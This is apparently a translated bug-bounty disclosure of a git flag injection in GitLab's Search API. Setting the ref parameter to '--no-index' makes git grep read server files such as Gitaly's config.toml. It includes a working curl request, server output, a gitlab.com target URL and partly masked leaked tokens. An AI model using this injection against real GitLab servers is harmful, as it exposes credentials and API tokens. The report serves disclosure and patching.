GitLab - Git flag injection - Search API with scope 'blobs'

Summary:

Gitlab 12.1.6修复了wiki_blob scope下的Search API,但是blobs scope仍受到git flag注入的影响,并允许读取/var/opt/gitlab/gitaly中的任意文件,包括config.toml。

Steps to reproduce:

调用Search API,将ref参数设置为--no-index,搜索常见的字符,例如.a,并且scope设置为blobs

curl --header "PRIVATE-TOKEN: $TOKEN" 'http://gitlab-vm.local/api/v4/projects/4/search?scope=blobs&search=.&ref=--no-index

[{"basename":null,"data":"VERSION\u00001\u0000Gitaly, version 1.53.2\n","filename":null,"id":null,"ref":"--no-index","startline":0,"project_id":4},{"basename":null,"data":"config.toml\u00001\u0000# Gitaly configuration file\nconfig.toml\u00002\u0000# This file is managed by gitlab-ctl. Manual changes will be\nconfig.toml\u00003\u0000# erased! To change the contents below, edit /etc/gitlab/gitlab.rb\nconfig.toml\u00004\u0000# and run:\nconfig.toml\u00005\u0000# sudo gitlab-ctl reconfigure\nconfig.toml\u00006\u0000\nconfig.toml\u00007\u0000socket_path = '/var/opt/gitlab/gitaly/gitaly.socket'\nconfig.toml\u00008\u0000bin_dir = '/opt/gitlab/embedded/bin'\nconfig.toml\u00009\u0000\n","filename":null,"id":null,"ref":"--no-index","startline":0,"project_id":4}]

ref参数最终传递给git grep,并将其设置为--no-index,包括当前工作目录和git没有管理的文件:

/opt/gitlab/embedded/bin/git --git-dir /var/opt/gitlab/git-data/repositories/@hashed/6b/86/6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b.git grep --ignore-case -I --line-number --null --before-context 2 --after-context 2 --perl-regexp -e a --no-index

Impact:

config.toml包含很多敏感信息,api密钥和令牌等。 例如在gitlab.com上测试发现该文件包含sentry.io api tokens以及gitaly token

https://gitlab.com/api/v4/projects/2009901/search?scope=blobs&search=a&ref=--no-index

sentry_dsn = 'https://927bee37df654608xxxxxxxxxxxxxxxx:[email protected]/16
ruby_sentry_dsn = 'https://8ff7dd344e1d4976xxxxxxxxxxxxxxxx:[email protected]/29

token = 'yfZTE0Oxxxxxxx'

Origin: